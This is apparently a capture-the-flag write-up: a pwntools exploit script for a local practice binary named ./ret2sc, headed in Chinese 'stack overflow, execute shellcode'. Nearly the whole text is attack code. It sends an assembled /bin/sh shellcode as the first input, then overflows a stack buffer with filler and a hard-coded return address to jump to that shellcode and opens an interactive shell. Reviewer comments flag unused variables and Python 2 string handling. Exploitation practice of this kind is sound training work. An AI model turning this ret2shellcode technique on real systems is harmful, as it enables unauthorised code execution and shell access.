栈溢出,执行shellcode
exp:
from pwn import *
# Turn on pwntools' most verbose tube logging: every byte sent/received is echoed.
context.log_level="debug"
# The target is the local binary ./ret2sc; this listing gives no other information about it.
p = process('./ret2sc')
elf = ELF('./ret2sc')
# Stack-overflow exercise: control flow is redirected to data the script wrote earlier.
# NOTE(review): read_plt and bss are looked up but never used anywhere below.
read_plt = elf.symbols['read']
bss = elf.bss()
log.info("-----------send shellcode----------------")
# First input: shellcraft.sh() assembled for the current `context` (arch/os are
# whatever pwntools defaults to, since nothing on this page sets them).
payload1 = asm(shellcraft.sh())
p.recvuntil("Name:")
p.sendline(payload1)
log.info("-----------return shellcode-----------------")
# Manual breakpoint: pause() blocks until the operator continues, so the second
# input is only sent on request.
pause()
# Second input: 0x1c bytes of filler, 4 more bytes ('bbbb'), then the 32-bit
# address 0x0804a060 — presumably filler up to the saved return address; the
# layout is not verifiable from this listing.
# NOTE(review): 0x0804a060 is hard-coded rather than derived from `bss` above.
# Python 2 form: str and bytes are concatenated directly here; under Python 3
# this mix raises TypeError.
payload2 = 'a'*0x1c + 'bbbb' + p32(0x0804a060)
p.recvuntil("Try your best:")
p.send(payload2)
# Hand the tube to the user for interactive I/O with the process.
p.interactive()